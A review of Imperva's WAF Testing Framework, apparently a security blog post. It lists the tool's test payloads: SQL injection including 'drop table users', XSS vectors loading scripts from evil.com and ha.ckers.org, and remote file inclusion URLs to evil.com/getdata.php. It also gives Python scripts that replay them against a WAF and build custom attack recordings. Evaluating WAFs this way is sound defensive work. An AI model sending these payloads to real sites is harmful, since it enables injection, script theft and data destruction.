The WAF Testing Framework was developed by Imperva employees Yaniv Azaria and Amichai Shulman and was presented at OWASP AppSec USA in 2012.
To work it requires:

  • Windows OS
  • Java 1.6
  • WebGoat application

Deployment

A WebGoat application is bundled with the tool, but you can also use one from another source (e.g. OWASPbwa). Deployment looks easy: install Java and run the compiled exe file. Still, you need at least one Windows VM to run the tool.
The network layout looks like this:

Tests

If the first attack is blocked, the tool stops sending similar requests, so to get the whole list of attacks I sent them to an unprotected application. The full list of requests is given below: 5 HTTP Parameter Pollution, 33 Remote File Inclusion, 17 Cross-Site Scripting and 10 SQL Injection.
Besides these, the tool sends 234 legitimate requests that are meant to provoke false positives, for example:

message=We dropped a million Deutschemark to get the schematic (and it was not worth it)
message=this is not good; drop the item you are holding!&SUBMIT=Submit
message=select one item from these funny things =)

HTTP Parameter Pollution

message=' or '&message=' <> 'x'
message=' or '&message=' <> 'xxx'
message=' or '&message=' <> 'xyz'
message=' or '&message=' = ','
message=' union/*&message=*/select number from credit_card

Remote File Inclusion

bidirect=http://www.acbdef.com/index.html
isDirect=http://www.acbdef.com/index.html
p_direction=http://www.acbdef.com/index.html
p_redirect_uri=http://www.acbdef.com/index.html
redirect=http://www.acbdef.com/index.html
redirect_uri=http://www.acbdef.com/index.html
redirecturl=http://www.acbdef.com/index.html
strRedirect=http://www.acbdef.com/index.html
document_root=http://www.evil.com/getdata.php
spaw_root=http://www.evil.com/getdata.php
CONF_INCLUDE_PATH=http://www.evil.com/getdata.php
page=http://www.evil.com/getdata.php
libpath=http://www.evil.com/getdata.php
base_path=http://www.evil.com/getdata.php
art=http://www.evil.com/getdata.php
dir=http://www.evil.com/getdata.php
url=http://www.evil.com/getdata.php
path_om=http://www.evil.com/getdata.php
include_path=http://www.evil.com/getdata.php
lang=http://www.evil.com/getdata.php
lng=http://www.evil.com/getdata.php
path_faqe=http://www.evil.com/getdata.php
lang=http://www.evil.com/getdata.php
root=http://www.evil.com/getdata.php
art=http://www.evil.com/getdata.php
lang=http://www.evil.com/getdata.php
path_om=http://www.evil.com/getdata.php
PathToRoot=http://www.evil.com/getdata.php
libpath=http://www.evil.com/getdata.php
goto=http://www.evil.com/getdata.php
goto=http://www.evil.com/getdata.php
template=http://www.evil.com/getdata.php
menu=http://www.evil.com/getdata.php

SQL Injection

message=' or 'a' = (select 'a')
message=' or 12345678 or 1=1
message= a' or 1 = (select 1 from dual)
message=a'; delete from customers where id = 12
message=a'; drop function login
message=a'; drop table users
message=a' or (case when 'a' then 1 else 0 end) = 0;
message=a' or (false) = 'c'	
message=a' or (select 1) = 1
message=a' or -+!1= -+!1

Cross-Site Scripting (XSS)

message=<BODY ONLOAD=alert('XSS')>
message=<IMG DYNSRC="javascript:alert('XSS')">
message=<IMG SRC=" &#14;  javascript:alert('XSS');">
message=<IMG SRC="jav&#x0A;ascript:alert('XSS');">
message=<IMG SRC="javascript:alert('XSS');">
message=<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
message=<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
message=<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
message=<IMG SRC=`javascript:alert("xxxx, 'XSS'")`>
message=<IMG SRC=javascript:alert(&quot;XSS&quot;)>
message=<IMG SRC=javascript:alert('XSS')>
message=<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
message=<SCRIPT/SRC="http://www.evil.com/xss.js"></SCRIPT>
message=<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
message=<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
message=<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
message=<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
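As an added example (my own script, not part of the framework or of the original write-up), here is a small Python harness that replays a corpus like the one above the way I would want the tool to: every request is sent regardless of whether the previous one was blocked, attack and legitimate requests are tallied separately, and a detection rate and a false-positive rate are computed. The corpus is constructed from a handful of the payloads listed above plus three of the legitimate messages. `naive_waf_blocks` is a hypothetical stand-in for a WAF with a few crude signatures, there only so the script runs offline; `make_http_sender` shows how the same harness would drive a real target (the URL it takes is an assumption).

```python
import http.client
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed corpus: a few payloads from each list above plus three of the
# legitimate messages. "legit" requests must pass; every other category should
# be blocked.
CORPUS = [
    ("legit", "message=We dropped a million Deutschemark to get the schematic (and it was not worth it)"),
    ("legit", "message=this is not good; drop the item you are holding!&SUBMIT=Submit"),
    ("legit", "message=select one item from these funny things =)"),
    ("hpp",   "message=' or '&message=' <> 'x'"),
    ("hpp",   "message=' union/*&message=*/select number from credit_card"),
    ("rfi",   "redirect=http://www.acbdef.com/index.html"),
    ("rfi",   "page=http://www.evil.com/getdata.php"),
    ("sqli",  "message=a'; drop table users"),
    ("sqli",  "message=a' or (select 1) = 1"),
    ("xss",   "message=<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>"),
    ("xss",   "message=<IMG SRC=javascript:alert('XSS')>"),
    ("xss",   "message=<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">"),
]

# Hypothetical stand-in for a WAF: a handful of crude signatures so the harness
# runs offline. It is deliberately naive (it blocks on the bare word "drop" and
# misses the entity-encoded "javascript:") to show why both corpora are needed.
NAIVE_RULES = [re.compile(p, re.IGNORECASE) for p in (
    r"'\s*or\s",                 # ' or ...
    r"\bdrop\b",                 # drop table / drop function
    r"\bunion\b.*\bselect\b",    # union ... select
    r"<script",                  # <SCRIPT ...>
    r"javascript:",              # javascript: URLs, literal form only
    r"=https?://",               # parameter value that is a remote URL
)]


def naive_waf_blocks(body):
    """Return True if the hypothetical signature WAF would block this body."""
    return any(rule.search(body) for rule in NAIVE_RULES)


def make_http_sender(target_url, blocked_statuses=(403,)):
    """Return an is_blocked(body) function that POSTs each body to a real
    WAF-protected URL (an assumed address such as http://10.0.0.5/sendmsg.jsp)
    and treats the given HTTP status codes as "blocked"."""
    parts = urlsplit(target_url)
    headers = {"Content-Type": "application/x-www-form-urlencoded",
               "Accept": "*/*", "Pragma": "no-cache"}

    def is_blocked(body):
        conn = http.client.HTTPConnection(parts.hostname, parts.port or 80, timeout=10)
        try:
            conn.request("POST", parts.path or "/", body=body.encode("utf-8"), headers=headers)
            return conn.getresponse().status in blocked_statuses
        finally:
            conn.close()
    return is_blocked


def evaluate(is_blocked, corpus):
    """Send every request in the corpus (the framework stops after the first
    blocked request; this does not) and tally results per category."""
    stats = defaultdict(lambda: {"sent": 0, "blocked": 0})
    missed, false_positives = [], []
    for category, body in corpus:
        stats[category]["sent"] += 1
        blocked = is_blocked(body)
        if blocked:
            stats[category]["blocked"] += 1
        if category == "legit" and blocked:
            false_positives.append(body)
        elif category != "legit" and not blocked:
            missed.append((category, body))
    return {"per_category": dict(stats), "missed": missed, "false_positives": false_positives}


def summarize(result):
    """Detection rate over all attack categories and false-positive rate over
    the legitimate requests."""
    per = result["per_category"]
    attacks = [v for c, v in per.items() if c != "legit"]
    sent = sum(v["sent"] for v in attacks)
    blocked = sum(v["blocked"] for v in attacks)
    legit = per.get("legit", {"sent": 0, "blocked": 0})
    return {
        "detection_rate": blocked / sent if sent else 0.0,
        "false_positive_rate": legit["blocked"] / legit["sent"] if legit["sent"] else 0.0,
    }


if __name__ == "__main__":
    result = evaluate(naive_waf_blocks, CORPUS)
    rates = summarize(result)
    for category, counts in sorted(result["per_category"].items()):
        print(f"{category:6s} blocked {counts['blocked']}/{counts['sent']}")
    print("missed:", result["missed"])
    print("false positives:", result["false_positives"])
    print(f"detection {rates['detection_rate']:.0%}, false positives {rates['false_positive_rate']:.0%}")
```

Against the naive rules the harness reports 8 of 9 attacks blocked (the entity-encoded IMG payload gets through) and 1 of 3 legitimate messages blocked ("drop the item you are holding" trips the `drop` signature), which is exactly the pair of numbers a WAF evaluation needs. To run it against a real device, pass `make_http_sender("http://<waf-host>/sendmsg.jsp")` instead of `naive_waf_blocks`.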

Custom attacks

The framework lets you add your own requests in XML format. The template looks like this:

<?xml version="1.0" encoding="UTF-8"?>

<http-recording>
    <sequence repeat="1">
        <request method="POST" protocol="http" protocol-version="HTTP/1.1" path="/sendmsg.jsp">
            <headers>
                <header name="Accept"><![CDATA[application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*]]></header>
                <header name="Accept-Language"><![CDATA[en-US]]></header>
                <header name="Content-Type"><![CDATA[application/x-www-form-urlencoded]]></header>
                <header name="Pragma"><![CDATA[no-cache]]></header>
            </headers>
            <body><![CDATA[subj=&text='+or+1=1+--+1&Username=Anonymous&x=32&y=7]]></body>
            <comment>Simple SQL Injection</comment>
        </request>
    </sequence>
</http-recording>

The following request attributes have to be set:

  • method: POST
  • protocol: http
  • protocol-version: HTTP/1.1
  • path, including any GET arguments: /sendmsg.jsp

Then add the headers the request needs (Accept, Accept-Language, Content-Type, Pragma), the request body, and a comment that will be included in the report.
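As an added example (my own script, not part of the framework), the following Python generates a recording in this layout from a list of (body, comment) pairs and parses one back, so a batch of custom payloads can be produced without hand-editing XML. The header set and the /sendmsg.jsp path are taken from the template above (the long Accept value is shortened); the two sample bodies at the bottom are constructed, one being the template's own SQL injection.

```python
from xml.dom import minidom
import xml.etree.ElementTree as ET

# Header set from the template above; Accept is shortened for readability.
DEFAULT_HEADERS = {
    "Accept": "*/*",
    "Accept-Language": "en-US",
    "Content-Type": "application/x-www-form-urlencoded",
    "Pragma": "no-cache",
}


def build_recording(requests, path="/sendmsg.jsp", repeat=1, headers=DEFAULT_HEADERS):
    """Return http-recording XML (as text) for the given (body, comment) pairs.

    Header values and bodies go into CDATA sections, as in the template, so
    payloads such as <SCRIPT> or &quot; need no escaping. CDATA cannot contain
    the terminator "]]>", so such a body is rejected rather than silently mangled.
    """
    doc = minidom.Document()
    root = doc.appendChild(doc.createElement("http-recording"))
    seq = root.appendChild(doc.createElement("sequence"))
    seq.setAttribute("repeat", str(repeat))
    for body, comment in requests:
        if "]]>" in body:
            raise ValueError("payload contains ']]>', which cannot be placed in a CDATA section")
        req = seq.appendChild(doc.createElement("request"))
        for name, value in (("method", "POST"), ("protocol", "http"),
                            ("protocol-version", "HTTP/1.1"), ("path", path)):
            req.setAttribute(name, value)
        hdrs = req.appendChild(doc.createElement("headers"))
        for name, value in headers.items():
            h = hdrs.appendChild(doc.createElement("header"))
            h.setAttribute("name", name)
            h.appendChild(doc.createCDATASection(value))
        req.appendChild(doc.createElement("body")).appendChild(doc.createCDATASection(body))
        req.appendChild(doc.createElement("comment")).appendChild(doc.createTextNode(comment))
    return doc.toprettyxml(indent="    ", encoding="UTF-8").decode("utf-8")


def load_recording(xml_text):
    """Parse http-recording XML back into a list of request dicts."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    requests = []
    for req in root.iter("request"):
        headers_el = req.find("headers")
        requests.append({
            "method": req.get("method"),
            "path": req.get("path"),
            "headers": {h.get("name"): (h.text or "")
                        for h in (headers_el if headers_el is not None else [])},
            "body": req.findtext("body", default=""),
            "comment": req.findtext("comment", default=""),
        })
    return requests


# Constructed sample payloads: the template's SQL injection plus one XSS from the list above.
SAMPLE_REQUESTS = [
    ("subj=&text='+or+1=1+--+1&Username=Anonymous&x=32&y=7", "Simple SQL Injection"),
    ("message=<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>", "XSS via RegExp source"),
]

if __name__ == "__main__":
    xml_text = build_recording(SAMPLE_REQUESTS)
    print(xml_text)
    for r in load_recording(xml_text):
        print(r["comment"], "->", r["body"])
```

Bodies are passed through raw, exactly as in the template, because HTTP Parameter Pollution samples repeat a parameter name and must not be re-encoded; if a payload needs form encoding, do it before handing it to `build_recording`.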

Summary

Report Example

report.pdf

Pros

  • Easy to deploy if you already have a Windows environment
  • Custom attack samples can be added in XML format
  • The report looks nice

Cons

  • Small number of attack samples
  • Attack samples are hard-coded somewhere inside the compiled package
  • Requires a Windows platform to run the tool
  • No CSRF token support: if the WAF adds CSRF token protection, all POST requests are blocked
  • Works properly only with the bundled custom WebGoat application

Reference materials

Video-presentation

Download page
Description
Slides from presentation